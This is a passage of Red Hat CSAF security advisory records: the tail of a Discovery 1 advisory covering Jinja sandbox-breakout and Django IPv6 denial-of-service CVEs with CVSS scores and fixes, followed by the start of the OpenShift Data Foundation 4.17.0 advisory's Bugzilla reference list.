"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jinja2: Jinja has a sandbox breakout through malicious filenames"
},
{
"cve": "CVE-2024-56326",
"cwe": {
"id": "CWE-693",
"name": "Protection Mechanism Failure"
},
"discovery_date": "2024-12-23T16:00:46.619763+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2333856"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Jinja package. In affected versions of Jinja, an oversight in how the Jinja sandboxed environment detects calls to str.format allows an attacker that controls the content of a template to execute arbitrary Python code. To exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications that execute untrusted templates. Jinja\u0027s sandbox does catch calls to str.format and ensures they don\u0027t escape the sandbox. However, storing a reference to a malicious string\u0027s format method is possible, then passing that to a filter that calls it. No such filters are built into Jinja but could be present through custom filters in an application. After the fix, such indirect calls are also handled by the sandbox.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jinja2: Jinja has a sandbox breakout through indirect reference to format method",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated as Moderate due to an oversight in Jinja\u0027s sandbox environment, allowing attackers to execute arbitrary Python code through controlled template content. This requires control over template content, making exploitation possible only in specific applications, thus limiting its overall impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-56326"
},
{
"category": "external",
"summary": "RHBZ#2333856",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2333856"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-56326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56326"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-56326",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56326"
},
{
"category": "external",
"summary": "https://github.com/pallets/jinja/commit/48b0687e05a5466a91cd5812d604fa37ad0943b4",
"url": "https://github.com/pallets/jinja/commit/48b0687e05a5466a91cd5812d604fa37ad0943b4"
},
{
"category": "external",
"summary": "https://github.com/pallets/jinja/releases/tag/3.1.5",
"url": "https://github.com/pallets/jinja/releases/tag/3.1.5"
},
{
"category": "external",
"summary": "https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h",
"url": "https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h"
}
],
"release_date": "2024-12-23T15:43:49.400000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jinja2: Jinja has a sandbox breakout through indirect reference to format method"
},
{
"cve": "CVE-2024-56374",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-01-14T20:01:09.167282+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2337996"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Django framework. Lack of upper bound limit enforcement in strings passed when performing IPv6 validation could lead to a potential denial of service attack. The undocumented and private functions `clean_ipv6_address` and `is_valid_ipv6_address` were vulnerable, as was the `django.forms.GenericIPAddressField` form field, which has now been updated to define a `max_length` of 39 characters.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "django: potential denial-of-service vulnerability in IPv6 validation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Within regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-770: Allocation of Resources Without Limits or Throttling vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nThe platform enforces hardening guidelines to apply the most restrictive settings required for operations, while baseline configurations maintain secure system and software states. A defense-in-depth monitoring strategy includes perimeter firewalls and endpoint protection services that detect excessive resource usage caused by malicious activity or system misconfigurations. In the event of exploitation, process isolation ensures workloads operate in separate environments, preventing any single process from overconsuming CPU or memory and degrading system performance.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-56374"
},
{
"category": "external",
"summary": "RHBZ#2337996",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2337996"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-56374",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56374"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-56374",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56374"
},
{
"category": "external",
"summary": "http://www.openwall.com/lists/oss-security/2025/01/14/2",
"url": "http://www.openwall.com/lists/oss-security/2025/01/14/2"
},
{
"category": "external",
"summary": "https://docs.djangoproject.com/en/dev/releases/security/",
"url": "https://docs.djangoproject.com/en/dev/releases/security/"
},
{
"category": "external",
"summary": "https://groups.google.com/g/django-announce",
"url": "https://groups.google.com/g/django-announce"
},
{
"category": "external",
"summary": "https://www.djangoproject.com/weblog/2025/jan/14/security-releases/",
"url": "https://www.djangoproject.com/weblog/2025/jan/14/security-releases/"
}
],
"release_date": "2025-01-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "django: potential denial-of-service vulnerability in IPv6 validation"
}
]
}
RHSA-2024:8676
Vulnerability from csaf_redhat - Published: 2024-10-30 14:25 - Updated: 2025-12-03 23:59Summary
Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.17.0 Security, Enhancement, & Bug Fix Update
Notes
Topic
Updated images that include numerous enhancements, security, and bug fixes are now available for Red Hat OpenShift Data Foundation 4.17.0 on Red Hat Enterprise Linux 9.
Details
Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multicloud data management service with an S3 compatible API.
These updated packages include numerous enhancements and bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat OpenShift Data Foundation Release Notes for information on the most significant of these changes:
https://docs.redhat.com/en/documentation/red_hat_openshift_data_foundation/4.17/html/4.17_release_notes/index
All Red Hat OpenShift Data Foundation users are advised to upgrade to these packages that provide these bug fixes and enhancements.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Updated images that include numerous enhancements, security, and bug fixes are now available for Red Hat OpenShift Data Foundation 4.17.0 on Red Hat Enterprise Linux 9.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multicloud data management service with an S3 compatible API.\n\nThese updated packages include numerous enhancements and bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat OpenShift Data Foundation Release Notes for information on the most significant of these changes:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_data_foundation/4.17/html/4.17_release_notes/index\n\nAll Red Hat OpenShift Data Foundation users are advised to upgrade to these packages that provide these bug fixes and enhancements.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:8676",
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2059669",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2059669"
},
{
"category": "external",
"summary": "2190161",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2190161"
},
{
"category": "external",
"summary": "2219310",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2219310"
},
{
"category": "external",
"summary": "2241329",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241329"
},
{
"category": "external",
"summary": "2245068",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245068"
},
{
"category": "external",
"summary": "2250364",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2250364"
},
{
"category": "external",
"summary": "2253013",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253013"
},
{
"category": "external",
"summary": "2257271",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2257271"
},
{
"category": "external",
"summary": "2259668",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259668"
},
{
"category": "external",
"summary": "2262777",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262777"
},
{
"category": "external",
"summary": "2268046",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268046"
},
{
"category": "external",
"summary": "2268820",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268820"
},
{
"category": "external",
"summary": "2271773",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2271773"
},
{
"category": "external",
"summary": "2272597",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2272597"
},
{
"category": "external",
"summary": "2275225",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2275225"
},
{
"category": "external",
"summary": "2275965",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2275965"
},
{
"category": "external",
"summary": "2276393",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276393"
},
{
"category": "external",
"summary": "2276672",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276672"
},
{
"category": "external",
"summary": "2279751",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279751"
},
{
"category": "external",
"summary": "2279876",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279876"
},
{
"category": "external",
"summary": "2280308",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2280308"
},
{
"category": "external",
"summary": "2280608",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2280608"
},
{
"category": "external",
"summary": "2280637",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2280637"
},
{
"category": "external",
"summary": "2283994",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283994"
},
{
"category": "external",
"summary": "2292435",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292435"
},
{
"category": "external",
"summary": "2292668",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292668"
},
{
"category": "external",
"summary": "2294234",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294234"
},
{
"category": "external",
"summary": "2294723",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294723"
},
{
"category": "external",
"summary": "2297265",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2297265"
},
{
"category": "external",
"summary": "2297295",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2297295"
},
{
"category": "external",
"summary": "2297447",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2297447"
},
{
"category": "external",
"summary": "2297454",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2297454"
},
{
"category": "external",
"summary": "2299630",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2299630"
},
{
"category": "external",
"summary": "2299639",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2299639"
},
{
"category": "external",
"summary": "2300021",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300021"
},
{
"category": "external",
"summary": "2300312",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300312"
},
{
"category": "external",
"summary": "2300331",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300331"
},
{
"category": "external",
"summary": "2300499",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300499"
},
{
"category": "external",
"summary": "2301889",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301889"
},
{
"category": "external",
"summary": "2302201",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302201"
},
{
"category": "external",
"summary": "2302257",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302257"
},
{
"category": "external",
"summary": "2302448",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302448"
},
{
"category": "external",
"summary": "2302507",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302507"
},
{
"category": "external",
"summary": "2302575",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302575"
},
{
"category": "external",
"summary": "2302774",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302774"
},
{
"category": "external",
"summary": "2302841",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302841"
},
{
"category": "external",
"summary": "2302842",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302842"
},
{
"category": "external",
"summary": "2303028",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303028"
},
{
"category": "external",
"summary": "2303342",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303342"
},
{
"category": "external",
"summary": "2303403",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303403"
},
{
"category": "external",
"summary": "2303619",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303619"
},
{
"category": "external",
"summary": "2303820",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303820"
},
{
"category": "external",
"summary": "2303821",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303821"
},
{
"category": "external",
"summary": "2303822",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303822"
},
{
"category": "external",
"summary": "2303823",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303823"
},
{
"category": "external",
"summary": "2303824",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303824"
},
{
"category": "external",
"summary": "2303825",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303825"
},
{
"category": "external",
"summary": "2303829",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303829"
},
{
"category": "external",
"summary": "2304073",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304073"
},
{
"category": "external",
"summary": "2304231",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304231"
},
{
"category": "external",
"summary": "2304232",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304232"
},
{
"category": "external",
"summary": "2304235",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304235"
},
{
"category": "external",
"summary": "2304238",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304238"
},
{
"category": "external",
"summary": "2304799",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304799"
},
{
"category": "external",
"summary": "2304810",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304810"
},
{
"category": "external",
"summary": "2304815",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304815"
},
{
"category": "external",
"summary": "2304993",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304993"
},
{
"category": "external",
"summary": "2305274",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305274"
},
{
"category": "external",
"summary": "2305295",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305295"
},
{
"category": "external",
"summary": "2305660",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305660"
},
{
"category": "external",
"summary": "2305880",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305880"
},
{
"category": "external",
"summary": "2306026",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2306026"
},
{
"category": "external",
"summary": "2306387",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2306387"
},
{
"category": "external",
"summary": "2306577",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2306577"
},
{
"category": "external",
"summary": "2307823",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2307823"
},
{
"category": "external",
"summary": "2307835",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2307835"
},
{
"category": "external",
"summary": "2307909",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2307909"
},
{
"category": "external",
"summary": "2308091",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308091"
},
{
"category": "external",
"summary": "2308101",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308101"
},
{
"category": "external",
"summary": "2308144",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308144"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2308304",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308304"
},
{
"category": "external",
"summary": "2308442",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308442"
},
{
"category": "external",
"summary": "2308446",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308446"
},
{
"category": "external",
"summary": "2309191",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309191"
},
{
"category": "external",
"summary": "2309195",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309195"
},
{
"category": "external",
"summary": "2309485",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309485"
},
{
"category": "external",
"summary": "2309486",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309486"
},
{
"category": "external",
"summary": "2309487",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309487"
},
{
"category": "external",
"summary": "2309488",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309488"
},
{
"category": "external",
"summary": "2309489",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309489"
},
{
"category": "external",
"summary": "2309700",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309700"
},
{
"category": "external",
"summary": "2310369",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310369"
},
{
"category": "external",
"summary": "2310385",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310385"
},
{
"category": "external",
"summary": "2310841",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310841"
},
{
"category": "external",
"summary": "2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "2311042",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311042"
},
{
"category": "external",
"summary": "2311043",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311043"
},
{
"category": "external",
"summary": "2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "2311468",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311468"
},
{
"category": "external",
"summary": "2311551",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311551"
},
{
"category": "external",
"summary": "2311790",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311790"
},
{
"category": "external",
"summary": "2311867",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311867"
},
{
"category": "external",
"summary": "2311885",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311885"
},
{
"category": "external",
"summary": "2311893",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311893"
},
{
"category": "external",
"summary": "2312137",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312137"
},
{
"category": "external",
"summary": "2312442",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312442"
},
{
"category": "external",
"summary": "2313178",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313178"
},
{
"category": "external",
"summary": "2313203",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313203"
},
{
"category": "external",
"summary": "2313515",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313515"
},
{
"category": "external",
"summary": "2313717",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313717"
},
{
"category": "external",
"summary": "2313736",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313736"
},
{
"category": "external",
"summary": "2314200",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2314200"
},
{
"category": "external",
"summary": "2314211",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2314211"
},
{
"category": "external",
"summary": "2314404",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2314404"
},
{
"category": "external",
"summary": "2314454",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2314454"
},
{
"category": "external",
"summary": "2314636",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2314636"
},
{
"category": "external",
"summary": "2315624",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315624"
},
{
"category": "external",
"summary": "2315651",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315651"
},
{
"category": "external",
"summary": "2315666",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315666"
},
{
"category": "external",
"summary": "2315709",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315709"
},
{
"category": "external",
"summary": "2315733",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315733"
},
{
"category": "external",
"summary": "2315846",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315846"
},
{
"category": "external",
"summary": "2318490",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318490"
},
{
"category": "external",
"summary": "2319102",
